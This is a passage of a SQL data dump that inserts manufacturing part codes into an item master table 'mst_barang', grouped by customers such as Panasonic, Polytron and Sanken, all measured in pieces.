'3F-07001500C2-000MOK', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0020', '0', '', '3F-070016 MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0021', '0', '', '3F-07001600A0-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0022', '0', '', '3F-07001600B0-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0023', '0', '', '3F-07001600C2-000MOAK', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0024', '0', '', '3F-076636', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0025', '0', '', '3F-076637', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0026', '0', '', '3F-076639', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0027', '0', '', '3F-077147 SB', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0028', '0', '', '3F-077155 SB', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0029', '0', '', '3F-077156 SB', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0030', '0', '', '3F-077479', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0031', '0', '', '3F-078383', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0032', '0', '', '3F-08201400AO-000 ( L=617)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0033', '0', '', '3F-090350', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0034', '0', '', '3K-00045300A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0035', '0', '', '3K-00822400A2-0002FINISH', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0036', '0', '', '3K-00822400A2-0002MATERIAL', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0037', '0', '', '3K-01064300A3', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0038', '0', '', '3K-010644-00A0(L=2940)-YS', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0039', '0', '', '3K-010644-00B0-0001-YS', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0040', '0', '', '3K-01064500AO-0001', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0041', '0', '', '3K-01064500AO-0001 (material indal)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0042', '0', '', '3K-01064600A2-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0043', '0', '', '3K-010646E', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0044', '0', '', '3K-01064700A1-1/21', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0045', '0', '', '3K-010648', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0046', '0', '', '3K-01181800AO-0001', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0047', '0', '', '3K-015326', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0048', '0', '', '3K-015327', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0049', '0', '', '3K-015328', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0050', '0', '', '3k-082014-00', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0051', '0', '', '3S000007', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0052', '0', '', '3S000008', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0053', '0', '', 'MAOR0014 ( nut )', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0054', '0', '', 'MAOR001500A1-000 ( 19.6)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0055', '0', '', 'MAOR001600A1-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0056', '0', '', 'MAPB-001701', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0057', '0', '', 'MAPB-001701A1-000/headrallright', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0058', '0', '', 'MAPB-001702A1-000/headrallleft', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0059', '0', '', 'PBC00001000AO', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0060', '0', '', 'Pipe dia 9.5mm L=697mm/3F0821000A0-000', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPB-0061', '0', '', 'WPSP-0008', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PARAMOUNT'); INSERT INTO mst_barang VALUES ('FPG-0001', '0', '', 'FL0501-07-00/BaseIL600', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC GOBEL'); INSERT INTO mst_barang VALUES ('FPG-0002', '0', '', 'FL0502-07-00/BaseIL900', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC GOBEL'); INSERT INTO mst_barang VALUES ('FPG-0003', '0', '', 'I-10758-1(CaseA)O3.72', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC GOBEL'); INSERT INTO mst_barang VALUES ('FPG-0004', '0', '', 'FZ322959121.2(CaseB)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC GOBEL'); INSERT INTO mst_barang VALUES ('FPG-0005', '0', '', 'NKB50-1128-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC GOBEL'); INSERT INTO mst_barang VALUES ('FPG-0006', '0', '', 'YJI-001 BA', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC GOBEL'); INSERT INTO mst_barang VALUES ('FPH-0001', '0', '', 'LSCC0854 ', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0002', '0', '', 'LSEK00780-2', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0003', '0', '', 'LSEK00781', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0004', '0', '', 'LSEK00782', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0005', '0', '', 'LSEK00783-1', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0006', '0', '', 'LSEK0849', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0007', '0', '', 'LSEK0851', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0008', '0', '', 'LSEK0881', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0009', '0', '', 'LSEK0882', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0010', '0', '', 'LSEK0883', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0011', '0', '', 'LSEK0884', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0012', '0', '', 'LSEK0894', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0013', '0', '', 'LSEK0922', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0014', '0', '', 'LSEK0938', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0015', '0', '', 'LSEK0939', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0016', '0', '', 'LSEK0940', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0017', '0', '', 'LSEK0941', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0018', '0', '', 'LSEK0942', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0019', '0', '', 'LSEK0943', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0020', '0', '', 'LSEK0944', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0021', '0', '', 'LSEK0945', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0022', '0', '', 'LSEK0946', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0023', '0', '', 'LSEK0964', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0024', '0', '', 'LSEK0970', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0025', '0', '', 'LSEK0972', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0026', '0', '', 'LSSC0766', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0027', '0', '', 'LSSC0796', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0028', '0', '', 'LSSC0797', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0029', '0', '', 'LSSC0798', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0030', '0', '', 'LSSC0799', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0031', '0', '', 'LSSC0800', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0032', '0', '', 'LSSC0812-3', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0033', '0', '', 'LSSC0814', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0034', '0', '', 'LSSC0815', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0035', '0', '', 'LSSC0816', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0036', '0', '', 'LSSC0817', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0037', '0', '', 'LSSC0856', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0038', '0', '', 'LSSC1116', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0039', '0', '', 'AL BLANK SHEET A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0040', '0', '', 'AL BLANK SHEET B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0041', '0', '', 'AL BLANK SHEET C', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0042', '0', '', 'AL BLANK SHEET D', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0043', '0', '', 'AL BLANK SHEET E', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPH-0044', '0', '', 'AL BLANK SHEET F', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC HEALTHCARE'); INSERT INTO mst_barang VALUES ('FPM-0001', '0', '', 'RMYN0017', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC MANUFACTURING INDONESIA'); INSERT INTO mst_barang VALUES ('FPM-0002', '0', '', 'RMYN0018', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC MANUFACTURING INDONESIA'); INSERT INTO mst_barang VALUES ('FPM-0003', '0', '', 'RMYN0018 ( Tembaga )', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC MANUFACTURING INDONESIA'); INSERT INTO mst_barang VALUES ('FPM-0004', '0', '', 'RMYN0018 ( Platting )', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC MANUFACTURING INDONESIA'); INSERT INTO mst_barang VALUES ('FPM-0005', '0', '', 'RMYN0018A-1 ( Tembaga+ ED Coating )', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC MANUFACTURING INDONESIA'); INSERT INTO mst_barang VALUES ('FPM-0006', '0', '', 'RMYN0019', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC MANUFACTURING INDONESIA'); INSERT INTO mst_barang VALUES ('FPM-0007', '0', '', 'TUC4N07300', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC MANUFACTURING INDONESIA'); INSERT INTO mst_barang VALUES ('FPM-0008', '0', '', 'TUC4N07301', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC MANUFACTURING INDONESIA'); INSERT INTO mst_barang VALUES ('FPM-0009', '0', '', 'TUC4N07400', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'PANASONIC MANUFACTURING INDONESIA'); INSERT INTO mst_barang VALUES ('FPT-0001', '0', '', 'DN31A367MOI', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'POLYTRON'); INSERT INTO mst_barang VALUES ('FPT-0002', '0', '', 'PN2201143', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'POLYTRON'); INSERT INTO mst_barang VALUES ('FPT-0003', '0', '', 'DN34D062', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'POLYTRON'); INSERT INTO mst_barang VALUES ('FPT-0004', '0', '', 'PN2201225', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'POLYTRON'); INSERT INTO mst_barang VALUES ('FSE-0001', '0', '', 'CF12C Heat sink', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SIIX EMS INDONESIA'); INSERT INTO mst_barang VALUES ('FSI-0001', '0', '', 'AP43456-125-02D', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0002', '0', '', 'AP47039-275-12', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0003', '0', '', 'APB42200-502A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0004', '0', '', 'APB42200-508', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0005', '0', '', 'APC32000-510B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0006', '0', '', 'APC32000-512A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0007', '0', '', 'APC42200-503A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0008', '0', '', 'APC42200-525', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0009', '0', '', 'APC42200-530C', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0010', '0', '', 'APC42200-541', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0011', '0', '', 'APC42200-542', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0012', '0', '', 'APC42200-543', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0013', '0', '', 'APC46100-501A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0014', '0', '', 'APC46400-502A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0015', '0', '', 'APC47100-501B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0016', '0', '', 'APE46100-537', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0017', '0', '', 'APH24000-023E', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0018', '0', '', 'APH24000-504E', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0019', '0', '', 'APH24000-506', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0020', '0', '', 'APH24000-507', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0021', '0', '', 'APH24400-501A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0022', '0', '', 'APH24400-502', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0023', '0', '', 'APH24400-502A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0024', '0', '', 'APH34000-109A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0025', '0', '', 'APH34000-504B', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0026', '0', '', 'APH34000-506C', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0027', '0', '', 'APH34000-530(Thernsheet)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0028', '0', '', 'APH34000-540', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0029', '0', '', 'APH34000-555/APH34000-555A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0030', '0', '', 'APH34000-556A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0031', '0', '', 'APH34000-561EThernsheet besar', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0032', '0', '', 'APH34000-561EThernsheetkecil', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0033', '0', '', 'APH34000-567A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0034', '0', '', 'APH34000-567AECOTORIO', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0035', '0', '', 'APH34000-583A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0036', '0', '', 'APH34000-590', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0037', '0', '', 'APH34000-598', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0038', '0', '', 'APH34000-646', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0039', '0', '', 'APH34000-647', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0040', '0', '', 'APH34000-658', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0041', '0', '', 'APH34000-701-2A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0042', '0', '', 'APH34000-733', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0043', '0', '', 'APH34000-737', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0044', '0', '', 'APH34000-738A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0045', '0', '', 'APH34000-759MF', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0046', '0', '', 'APH34000-832-A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0047', '0', '', 'APH34000-855-2A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0048', '0', '', 'APH34100-526D(Thernsheetkecil)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0049', '0', '', 'APH34100-526D(thernsheetbesar)', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0050', '0', '', 'APH34100-549A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0051', '0', '', 'APH34100-551', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0052', '0', '', 'APH34100-557', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0053', '0', '', 'APH34100-558', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0054', '0', '', 'APH34200-307C', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0055', '0', '', 'APH34200-308', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0056', '0', '', 'APH34200-518', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0057', '0', '', 'APH34200-599A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0058', '0', '', 'APH34200-601A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0059', '0', '', 'APH34200-606', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0060', '0', '', 'APH34200-625A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0061', '0', '', 'APH34200-641', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0062', '0', '', 'APH34200-642A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES ('FSI-0063', '0', '', 'APH34200-643A', '', '', '', null, null, null, null, null, null, '', '', 'PCS', null, '', '', 'SANKEN'); INSERT INTO mst_barang VALUES 